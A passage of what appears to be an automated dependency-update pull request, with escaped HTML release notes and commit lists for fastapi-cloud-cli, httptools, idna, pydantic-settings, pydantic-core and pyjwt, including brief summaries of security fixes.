href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/194\"\u003e#194\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump fastar from 0.10.0 to 0.11.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/188\"\u003e#188\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Add zizmor and fix audit findings. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/183\"\u003e#183\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆️ Bump \u003ccode\u003ety\u003c/code\u003e from 0.0.21 to 0.0.35 and error on warnings. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/195\"\u003e#195\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump actions/labeler from 6.0.1 to 6.1.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/193\"\u003e#193\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/blob/main/release-notes.md\"\u003efastapi-cloud-cli's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.18.0 (2026-05-22)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🚸 Show Top-3 files larger than threshold on \u003ccode\u003edeploy\u003c/code\u003e command. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/190\"\u003e#190\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✨ Show if there's a new fastapi-cloud-cli version available. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/201\"\u003e#201\u003c/a\u003e by \u003ca href=\"https://github.com/patrick91\"\u003e\u003ccode\u003e@​patrick91\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Rename \u003ccode\u003eapp_slug\u003c/code\u003e parameter of \u003ccode\u003e_get_app\u003c/code\u003e to \u003ccode\u003eapp_id\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/192\"\u003e#192\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e♻️ Improve message around application directory. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/191\"\u003e#191\u003c/a\u003e by \u003ca href=\"https://github.com/patrick91\"\u003e\u003ccode\u003e@​patrick91\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/197\"\u003e#197\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/194\"\u003e#194\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump fastar from 0.10.0 to 0.11.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/188\"\u003e#188\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Add zizmor and fix audit findings. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/183\"\u003e#183\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆️ Bump \u003ccode\u003ety\u003c/code\u003e from 0.0.21 to 0.0.35 and error on warnings. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/195\"\u003e#195\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump actions/labeler from 6.0.1 to 6.1.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/193\"\u003e#193\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/26541b275a6aaeadad9a27c8177771f5939c2d3f\"\u003e\u003ccode\u003e26541b2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.18.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/d3423567b862e67df04144054b2e4b69cc497f17\"\u003e\u003ccode\u003ed342356\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/1ca104f73223a98e2764d99d8c3a1bead23dc22a\"\u003e\u003ccode\u003e1ca104f\u003c/code\u003e\u003c/a\u003e 🚸 Show Top-3 files larger than threshold on \u003ccode\u003edeploy\u003c/code\u003e command (\u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/issues/190\"\u003e#190\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/32a17b8854d6a27464f30e43e83ba73d42b41fe0\"\u003e\u003ccode\u003e32a17b8\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/18b4a43c6e286277a6a9d510b0458d17afc899d0\"\u003e\u003ccode\u003e18b4a43\u003c/code\u003e\u003c/a\u003e ✨ Show if there's a new fastapi-cloud-cli version available (\u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/issues/201\"\u003e#201\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/ce2110b7b97fb57bc6a547b7972fdce01679fe66\"\u003e\u003ccode\u003ece2110b\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/4916f02249b5d703ff7e78cf3c9921b66589b43e\"\u003e\u003ccode\u003e4916f02\u003c/code\u003e\u003c/a\u003e 🔒️ Only allow team members to modify dependencies (\u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/issues/197\"\u003e#197\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/8dae1ac9758bab3d99d0a2b669e551a0ec8a9984\"\u003e\u003ccode\u003e8dae1ac\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/0780b8933ee29ad6cfd7fb7167eaa106cd2d8775\"\u003e\u003ccode\u003e0780b89\u003c/code\u003e\u003c/a\u003e ⬆ Bump urllib3 from 2.6.3 to 2.7.0 (\u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/issues/194\"\u003e#194\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/8790640da9e24e140d14b928016c6c85f7f62bb8\"\u003e\u003ccode\u003e8790640\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/compare/0.17.1...0.18.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `httptools` from 0.7.1 to 0.8.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/MagicStack/httptools/releases\"\u003ehttptools's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.8.0\u003c/h2\u003e\n\u003ch1\u003eChanges\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd http-parser and llhttp licenses into the wheels (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/135\"\u003e#135\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/justeph\"\u003e\u003ccode\u003e@​justeph\u003c/code\u003e\u003c/a\u003e in c398a157)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMark cython module as free-threading compatible (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/139\"\u003e#139\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/kumaraditya303\"\u003e\u003ccode\u003e@​kumaraditya303\u003c/code\u003e\u003c/a\u003e in 28d1db15)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix all typing issues (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/134\"\u003e#134\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in a9bda0ed)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eBump llhttp to 9.4.1 (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/145\"\u003e#145\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/fantix\"\u003e\u003ccode\u003e@​fantix\u003c/code\u003e\u003c/a\u003e in e3e8d71e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSecurity: fix URL truncation issue (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/144\"\u003e#144\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/fantix\"\u003e\u003ccode\u003e@​fantix\u003c/code\u003e\u003c/a\u003e in a0283f07 for \u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/142\"\u003e#142\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAllow building with latest setuptools (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/138\"\u003e#138\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/OldManYellsAtCloud\"\u003e\u003ccode\u003e@​OldManYellsAtCloud\u003c/code\u003e\u003c/a\u003e in c403ad1a)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/cf10ce6f0dae56e61817e67b9bb073dd39d0191a\"\u003e\u003ccode\u003ecf10ce6\u003c/code\u003e\u003c/a\u003e httptools 0.8.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/a0283f07c8a7a3f81e26135283daa25e4baba3af\"\u003e\u003ccode\u003ea0283f0\u003c/code\u003e\u003c/a\u003e security: fix URL truncation issue (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/144\"\u003e#144\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/05e6b8e9cf71fed8fa0e4796a2c1a52351b2e182\"\u003e\u003ccode\u003e05e6b8e\u003c/code\u003e\u003c/a\u003e ci: add freethreading 3.14 to the CI matrix (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/146\"\u003e#146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/e3e8d71ee946937209aa965400cc2a8710520215\"\u003e\u003ccode\u003ee3e8d71\u003c/code\u003e\u003c/a\u003e Bump llhttp to 9.4.1 (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/145\"\u003e#145\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/a9bda0edb93da51c68cbf6db791c958166b86249\"\u003e\u003ccode\u003ea9bda0e\u003c/code\u003e\u003c/a\u003e Fix all typing issues (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/134\"\u003e#134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/28d1db15eaeaab5bc7d376d2c2035d966b6e1378\"\u003e\u003ccode\u003e28d1db1\u003c/code\u003e\u003c/a\u003e mark cython module as free-threading compatible (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/139\"\u003e#139\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/c403ad1ad6cc9345834269a0611b74c6ee4bdcfa\"\u003e\u003ccode\u003ec403ad1\u003c/code\u003e\u003c/a\u003e Allow building with latest setuptools (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/138\"\u003e#138\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/c398a1579a30ba12b5aeed2d7163644947514590\"\u003e\u003ccode\u003ec398a15\u003c/code\u003e\u003c/a\u003e Add http-parser and llhttp licenses into the wheels (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/135\"\u003e#135\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/4cfdabd31ccfd5ccf9ab8c60992b4348ebcf5a84\"\u003e\u003ccode\u003e4cfdabd\u003c/code\u003e\u003c/a\u003e ci: fix release workflow (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/132\"\u003e#132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/ef71da977cde416fcbd570393fe0c1e22d26b56f\"\u003e\u003ccode\u003eef71da9\u003c/code\u003e\u003c/a\u003e Post-release version bump\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/MagicStack/httptools/compare/v0.7.1...v0.8.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 3.13 to 3.17\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.md\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.17 (2026-05-28)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSubstantial 75% reduction in memory usage through new data\nstructures and some optimization in processing speed.\u003c/li\u003e\n\u003cli\u003eAdded a general 1024-character input length cap to the public\nvalidation, conversion, and codec entry points. This is well above\nany legitimate domain or label and guards against pathological\ninputs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.16 (2026-05-22)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd a command-line interface (\u003ccode\u003epython -m idna\u003c/code\u003e, also available as\nthe \u003ccode\u003eidna\u003c/code\u003e script). Encodes or decodes one or more domains supplied\nas arguments or on standard input, with options to select A-label\nor U-label output and control error handling.\u003c/li\u003e\n\u003cli\u003eRaise the minimum supported Python version to 3.9\u003c/li\u003e\n\u003cli\u003eVarious code quality improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.15 (2026-05-12)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnforce DNS-length cap on individual labels early in \u003ccode\u003echeck_label\u003c/code\u003e,\nshort-circuiting contextual-rule processing for oversized input\nwhile staying compatible with UTS 46 usage.\u003c/li\u003e\n\u003cli\u003eTidy core helpers: hoist bidi category sets to module-level\nfrozensets (avoiding per-codepoint list construction), simplify\nlength checks, and reuse the shared \u003ccode\u003e_unicode_dots_re\u003c/code\u003e from\n\u003ccode\u003eidna.core\u003c/code\u003e in the codec module.\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003eraise ... from err\u003c/code\u003e for proper exception chaining and\nswitch internal string formatting to f-strings.\u003c/li\u003e\n\u003cli\u003eAllow \u003ccode\u003eflit_core\u003c/code\u003e 4.x in the build backend.\u003c/li\u003e\n\u003cli\u003eExpand the ruff lint set (flake8-bugbear, flake8-simplify,\npyupgrade, perflint) and apply the surfaced fixes; pin lint CI\nto Python 3.14.\u003c/li\u003e\n\u003cli\u003eAdd Dependabot configuration for GitHub Actions.\u003c/li\u003e\n\u003cli\u003eConvert README and HISTORY from reStructuredText to Markdown.\u003c/li\u003e\n\u003cli\u003eReference CVE-2026-45409 for the 3.14 advisory in place of the\ninitial GHSA identifier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Felix Yan, Stan Ulbrych, and metsw24-max for\ncontributions to this release.\u003c/p\u003e\n\u003ch2\u003e3.14 (2026-05-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved opportunity to process long inputs into quadratic\ntime by rejecting oversize inputs up-front. Closes a bypass\nof the CVE-2024-3651 mitigation. [CVE-2026-45409]\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Stan Ulbrych for reporting the issue.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f48619c4cea6859b938d560fdd9feb898e678567\"\u003e\u003ccode\u003ef48619c\u003c/code\u003e\u003c/a\u003e Release 3.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/7421ba8003227f816142ab40178e3a7d204e6847\"\u003e\u003ccode\u003e7421ba8\u003c/code\u003e\u003c/a\u003e Pre-release 3.17rc0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/22ebb73b164081f209449b50162eb7ce086e96a4\"\u003e\u003ccode\u003e22ebb73\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/251\"\u003e#251\u003c/a\u003e from kjd/structure-optimizations\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/2a7ac0a58c788d50112a5003af545a83807fb108\"\u003e\u003ccode\u003e2a7ac0a\u003c/code\u003e\u003c/a\u003e Drop redundant parallel-arrays comment from uts46data\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/354eee9850a7b2962b65ae02010f7ebd9c99b7ed\"\u003e\u003ccode\u003e354eee9\u003c/code\u003e\u003c/a\u003e Apply ruff format to uts46data.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/8c34ffcab603b4a7a727d4e286b1f3342813281d\"\u003e\u003ccode\u003e8c34ffc\u003c/code\u003e\u003c/a\u003e Refactor uts46data into parallel arrays\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1189629e8a319f7c2b4678b5716c180ebd97de03\"\u003e\u003ccode\u003e1189629\u003c/code\u003e\u003c/a\u003e Range-encode joining_types for compact representation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f90b87adc6b6b2a591dfc7fb3f8e47870dc81722\"\u003e\u003ccode\u003ef90b87a\u003c/code\u003e\u003c/a\u003e Generic length limit for functions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/d6ffd28be164dfbd3ebca8b3396e39d191f4909b\"\u003e\u003ccode\u003ed6ffd28\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/247\"\u003e#247\u003c/a\u003e from kjd/release-3.16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/6d1a0de52a8b4690f1b2a89829aa85ff1de3635a\"\u003e\u003ccode\u003e6d1a0de\u003c/code\u003e\u003c/a\u003e Release 3.16\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v3.13...v3.17\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pydantic-settings` from 2.14.0 to 2.14.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pydantic/pydantic-settings/releases\"\u003epydantic-settings's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.14.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump the python-packages group with 4 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/850\"\u003epydantic/pydantic-settings#850\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 5 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/854\"\u003epydantic/pydantic-settings#854\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the github-actions group with 3 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/853\"\u003epydantic/pydantic-settings#853\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump the python-packages group with 2 updates by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/856\"\u003epydantic/pydantic-settings#856\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix field named \u003ccode\u003ecls\u003c/code\u003e conflicting with classmethod parameter by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/858\"\u003epydantic/pydantic-settings#858\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare release 2.14.1 by \u003ca href=\"https://github.com/hramezani\"\u003e\u003ccode\u003e@​hramezani\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/pull/859\"\u003epydantic/pydantic-settings#859\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/pydantic/pydantic-settings/compare/v2.14.0...v2.14.1\"\u003ehttps://github.com/pydantic/pydantic-settings/compare/v2.14.0...v2.14.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/e95c30bec8cfaee88ee275138c064aea97a25bdf\"\u003e\u003ccode\u003ee95c30b\u003c/code\u003e\u003c/a\u003e Prepare release 2.14.1 (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/859\"\u003e#859\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/0c8734581b6cf70a995afad603ac456631d00621\"\u003e\u003ccode\u003e0c87345\u003c/code\u003e\u003c/a\u003e Fix field named \u003ccode\u003ecls\u003c/code\u003e conflicting with classmethod parameter (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/858\"\u003e#858\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/7bd0072795a800065b42210b6dca90fc9b83daf7\"\u003e\u003ccode\u003e7bd0072\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 2 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/856\"\u003e#856\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/b03e573d017ed48e1c2774a5e0b715db9766c76b\"\u003e\u003ccode\u003eb03e573\u003c/code\u003e\u003c/a\u003e Bump the github-actions group with 3 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/853\"\u003e#853\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/eaa3b434938411ec8a3717ea646614561e713f51\"\u003e\u003ccode\u003eeaa3b43\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 5 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/854\"\u003e#854\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/pydantic-settings/commit/9f95615c24c6813c1d7d203576581a79cb6d9e8e\"\u003e\u003ccode\u003e9f95615\u003c/code\u003e\u003c/a\u003e Bump the python-packages group with 4 updates (\u003ca href=\"https://redirect.github.com/pydantic/pydantic-settings/issues/850\"\u003e#850\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/pydantic/pydantic-settings/compare/v2.14.0...v2.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pydantic-core` from 2.46.4 to 2.47.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/pydantic/pydantic/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca 